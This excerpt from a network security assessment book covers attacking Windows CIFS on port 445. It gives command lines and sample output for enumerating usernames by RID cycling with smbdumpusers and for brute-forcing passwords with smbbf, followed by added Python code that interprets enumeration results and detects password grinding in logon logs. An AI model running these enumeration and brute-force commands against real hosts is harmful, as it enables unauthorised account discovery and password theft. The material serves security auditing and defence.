9.6 The CIFS Service


The Common Internet File System (CIFS) is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility.

Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).

9.6.1 CIFS Enumeration

In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job.

The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Win32 executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.

9.6.1.1 User enumeration through smbdumpusers

The smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both the NetBIOS session (TCP 139) and CIFS (TCP 445) services. It can also enumerate users in two ways: through a direct dump, which works when RestrictAnonymous=0, and through the RID cycling technique, which evades RestrictAnonymous=1 by attempting to reverse each ID value to a username. Example 9-20 shows the usage and command-line options for smbdumpusers.

Example 9-20. smbdumpusers usage and command-line options
    D:\smb-at> smbdumpusers
    SMB - DumpUsers V1.0.4 by (patrik.karlsson@ixsecurity.com)
    -------------------------------------------------------------------
    usage: smbdumpusers -i <ipaddress|ipfile> [options]
            -i*     IP or <filename> of server[s] to bruteforce
            -m      Specify which mode
                        1 Dumpusers (Works with restrictanonymous=0)
                        2 SidToUser (Works with restrictanonymous=0|1)
            -f      Filter output
                        0 Default (Filter Machine Accounts)
                        1 Show All
            -e      Amount of sids to enumerate
            -E      Amount of sid mismatches before aborting mode 2
            -n      Start at SID
            -s      Name of the server to bruteforce
            -r      Report to <ip>.txt
            -t      timeout for connect (default 300ms)
            -v      Be verbose
            -P      Protocol version
                        0 - Netbios Mode
                        1 - Windows 2000 Native Mode

Example 9-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 9-3) through CIFS.

Example 9-21. Cycling RID values to find usernames with smbdumpusers
    D:\smb-at> smbdumpusers -i 192.168.189.1 -m 2 -P1
    500-Administrator
    501-Guest
    513-None
    1000-__vmware__
    1001-__vmware_user__
    1002-VUSR_OSG-SERV
    1003-mickey
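As an added example of reading what such a RID cycle exposes (this is not code from the book or from the SMB-AT project), the following Python parses mode-2 output lines of the form shown above and labels each account; the sample lines and the domain SID are constructed, and the well-known RID meanings are standard Windows.

```python
# Added example (not from the book): interpret the RID-to-name pairs that an
# smbdumpusers "-m 2" RID cycle resolves. Sample output lines and the domain
# SID are constructed; the well-known RID meanings are standard Windows.
import re

# RIDs Windows fixes in every account domain. Renaming an account does not
# change its RID, so a RID cycle still finds a renamed Administrator at 500.
WELL_KNOWN = {500: "Administrator", 501: "Guest", 513: "None"}  # 513 = primary group
FIRST_USER_RID = 1000   # ordinary accounts are allocated upward from here
LINE_RE = re.compile(r"^(\d+)-(\S+)$")

def parse_dump(output):
    """'500-Administrator' lines -> {500: 'Administrator'}."""
    pairs = (LINE_RE.match(l.strip()) for l in output.splitlines())
    return {int(m.group(1)): m.group(2) for m in pairs if m}

def classify(rid, name):
    """Label an account the way an auditor reads a RID-cycle result."""
    if name.endswith("$"):
        return "machine"              # what the tool's '-f 0' filter hides
    if rid in WELL_KNOWN:
        return "builtin-default" if name == WELL_KNOWN[rid] else "builtin-renamed"
    return "user" if rid >= FIRST_USER_RID else "builtin"

def audit(output, domain_sid):
    """Return (full SID, name, label) per resolved RID, lowest RID first."""
    return [(f"{domain_sid}-{rid}", name, classify(rid, name))
            for rid, name in sorted(parse_dump(output).items())]

# Constructed sample in the tool's mode-2 output shape (not real output).
SAMPLE = """500-Administrator
501-Guest
513-None
1000-svc_backup
1003-mickey
1004-WIDGETS$"""
```

Running audit(SAMPLE, "S-1-5-21-111-222-333") shows the three built-in accounts with their default names, two ordinary users, and one machine account that the default filter would hide.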

9.6.2 CIFS Brute Force

The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 9-22 shows the smbbf usage.

Example 9-22. smbbf usage and command-line options
    D:\smb-at> smbbf
    SMB - Bruteforcer V1.0.4 by (patrik.karlsson@ixsecurity.com)
    --------------------------------------------------------------
    usage: smbbf -i [options]
            -i*     IP address of server to bruteforce
            -p      Path to file containing passwords
            -u      Path to file containing users
            -s      Server to bruteforce
            -r      Path to report file
            -t      timeout for connect (default 300ms)
            -w      Workgroup/Domain
            -g      Be nice, automaticaly detect account lockouts
            -v      Be verbose
            -P      Protocol version
                        0 - Netbios Mode
                        1 - Windows 2000 Native Mode

To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 9-23.

Example 9-23. Using smbbf against the CIFS service
    D:\smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1
    INFO: Could not determine server name ...
    -- Starting password analysis on 192.168.189.1 --
    Logging in as Administrator  with secret on WIDGETS
    Access denied
    Logging in as Administrator  with qwerty on WIDGETS
    Access denied
    Logging in as Administrator  with letmein on WIDGETS
    Access denied
    Logging in as Administrator  with password on WIDGETS
    Access denied
    Logging in as Administrator  with abc123 on WIDGETS
    Access denied

The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second.

If smbbf is run with only an IP address specified, it does the following:

  • Retrieves a list of valid usernames through a null session

  • Attempts to log in to each account with a blank password

  • Attempts to log in to each account with the username as password

  • Attempts to log in to each account with the password of "password"

The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.
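Grinding at this pace leaves a distinctive trace on the target: one source producing a dense run of failed logons across several accounts. As an added example (not code from the book or from SMB-AT), the following Python flags that pattern in failed-logon records; the record format, timestamps and addresses are constructed.

```python
# Added example (not from the book): flag smbbf-style password grinding in
# failed-logon records. The 'time src_ip user RESULT' format is constructed.
from collections import defaultdict
from datetime import datetime, timedelta

def parse_records(text):
    """Return (time, src, user, ok) tuples from constructed log lines."""
    rows = []
    for line in text.splitlines():
        ts, src, user, result = line.split()
        rows.append((datetime.fromisoformat(ts), src, user, result == "OK"))
    return rows

def detect_grinding(rows, window=timedelta(seconds=10), min_failures=20, min_users=3):
    """Per source, find the densest window of failures and report it when it holds
    at least min_failures against at least min_users accounts (wordlist x userlist)."""
    fails = defaultdict(list)
    for when, src, user, ok in rows:
        if not ok:
            fails[src].append((when, user))
    flagged = {}
    for src, events in fails.items():
        events.sort()
        start, best = 0, None
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1          # slide the window forward in time
            win = events[start:end + 1]
            users = {u for _, u in win}
            if len(win) >= min_failures and len(users) >= min_users:
                if best is None or len(win) > best["failures"]:
                    best = {"failures": len(win), "users": sorted(users),
                            "span_s": (win[-1][0] - win[0][0]).total_seconds()}
        if best:
            flagged[src] = best
    return flagged

def build_sample():
    """Constructed trace: 192.168.189.50 tries 5 passwords against each of 5
    accounts 80 ms apart (a grinding pace); 10.0.0.7 is one user mistyping twice."""
    t0 = datetime(2006, 1, 1, 12, 0, 0)
    lines, t = [], t0
    for user in ["Administrator", "Guest", "mickey", "svc_backup", "jsmith"]:
        for _ in range(5):
            lines.append(f"{t.isoformat()} 192.168.189.50 {user} FAIL")
            t += timedelta(milliseconds=80)
    for offset, result in ((0, "FAIL"), (3, "FAIL"), (6, "OK")):
        lines.append(f"{(t0 + timedelta(seconds=offset)).isoformat()} 10.0.0.7 jsmith {result}")
    return "\n".join(lines)
```

detect_grinding(parse_records(build_sample())) reports only 192.168.189.50, with 25 failures across all five accounts in under two seconds, while the genuine user's two failures stay below the threshold.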

Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Pages: 166
Authors: Chris McNab